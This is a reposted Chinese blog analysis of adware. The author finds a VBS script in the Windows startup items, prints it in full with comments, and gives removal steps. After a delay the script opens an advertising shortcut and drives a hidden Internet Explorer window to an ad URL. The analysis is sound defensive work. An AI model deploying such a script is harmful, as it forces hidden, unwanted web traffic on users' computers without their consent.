欢迎来到 安全网 ! 请记住我们的网址 http://www. hack58 .Com

自动弹出网页的恶意脚本分析

来源:转载 作者:佚名 时间:2010-03-02 09:56:42

by:riusksk
blog:http://riusksk.blogbus.com

这几天在开机后,都会自动弹出一个广告网站,在注册表中搜索弹出的网页,无果而返,接着再看了一下启动项,发现个VBS脚本文件,如下图:
点击查看原始尺寸

下载 (56.75 KB)
2010-3-2 00:43


找到这个脚本文件后,用记事本打开,代码如下:

00000: On Error Resume Next
00001: Dim Fso,wss,HKRegStr
00002: Set Fso= CreateObject("Scripting.FileSystemObject")
00003: Set wss=CreateObject("WScript.Shell")
00004: HKRegStr=wss.RegRead("HKEY_CURRENT_USER\Software\Maxthon2\Folder")
00005: if HKRegStr<>"" then
00006: HKRegStr=HKRegStr+"\Maxthon.exe"     '默认使用傲游浏览器打开网站
00007: if (Fso.FileExists(HKRegStr)) then
00008: wscript.sleep 600000        '脚本运行10分钟之后再打开网站
00009: '网址之家.url是一个快捷方式文件,指向http://www.so02.cn/?sid=1,如下图所示:
QQ截图未命名.jpg

下载 (15.72 KB)
2010-3-2 00:45


00010: CreateObject("WScript.Shell").run """" & HKRegStr &""" C:\Windows\system32\网址之家.url",x,ture   
00011: set ie=WScript.createobject("internetexplorer.application")
00012: ie.visible = 0
00013: ie.navigate "http://qw.ad29.com/ji.asp"                '接着再打开这个网址
00014: wscript.sleep 10000        '暂时10秒
00015: ie.quit
00016: else
00017: '假如没有注册表中指定的Maxthon.exe,则用默认浏览器打开网址之家.url,也就是http://www.so02.cn/?sid=1
00018: wscript.sleep 600000
00019: CreateObject("WScript.Shell").run" C:\Windows\system32\网址之家.url",x,ture       
00020: end if
00021: else
00022: '假如注册表HKEY_CURRENT_USER\Software\Maxthon2\Folder无键值,则10分钟后打开网址之家.url
00023: wscript.sleep 600000
00024: CreateObject("WScript.Shell").run "C:\Windows\system32\网址之家.url" ,x,ture
00025: end if

清除方法:去掉启动项中的网址之家.vbs并将其删除,再将 C:\Windows\system32\网址之家.url 也清除,重启之后搞定。